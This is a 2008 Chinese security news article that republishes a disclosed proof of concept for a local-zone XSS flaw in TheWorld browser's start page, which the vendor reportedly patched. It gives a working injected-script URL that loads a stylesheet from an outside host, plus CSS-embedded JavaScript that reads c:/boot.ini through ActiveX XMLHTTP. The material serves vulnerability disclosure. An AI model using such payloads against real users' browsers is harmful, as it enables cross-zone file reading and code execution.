世界之窗等浏览器本地xss跨域漏洞POC

作者：网盾编辑日期：2008年6月27日点击：次

阅读提示：　　80sec近期公布的世界之窗浏览器的安全问题，近日厂商已经修补，本文将介绍如何利用相关漏洞的POC，帮助用户了解并预防相关漏洞。

　　漏洞说明：http://www.80sec.com/360-sec-browser-localzone-xss.html

　　文档来源:http://www.80sec.com/release/The-world-browser-locale-zone-xss-POC.txt

　　漏洞分析：世界之窗浏览器在起始页面是以res://E:\PROGRA~1\THEWOR~1.0\languages\chs.dll/TWHOME.HTM的形式来处理的，而由于缺乏对res协议安全的必要控制，导致页面的权限很高，而该页面中存在的一个xss问题将导致本地跨域漏洞，简单分析如下：

　　str_name和str_url不经过滤地直接输出，由于该页面处于本地安全区域，所以拥有很高的权限，可以做很多跨域操作，包括读取文件和运行本地程序。

　　漏洞修补：

　　已经用js控制DOM显示了

　　漏洞演示：这里提供测试方法可以读取c:/boot.ini

　　1 打开如下地址

sc:h’><script>alert(document.write(unescape(”%3CLINK%20REL%3D%22stylesheet%22%20HREF%3D%22http%3A%2f%2fwww.80sec.com/1.css%22%3E”)))</script>

　　2 上面将导致一个不可访问的页面，然后直接关闭tw浏览器( 没有好的办法crash)

　　3 重新打开tw浏览器，可以发现http://www.80sec.com/1.css中的内容被解析，并且有本地域的权限。

　　1.css内容，换成其他js代码一样执行

body {
background-image: url('javascript:alert(document.location);xmlhttp=new ActiveXObject("Msxml2.XMLHTTP.3.0");xmlhttp.open("GET","c:/boot.ini",false);xmlhttp.send();alert(xmlhttp.responseText);')
}

　　漏洞状态：

　　2008-06-24通知厂商

　　2008-06-25修补

　　http://www.ioage.com/cnnew/uplog.htm

来源：IT专家网编辑：花脸道

【投稿】【打印】【关闭】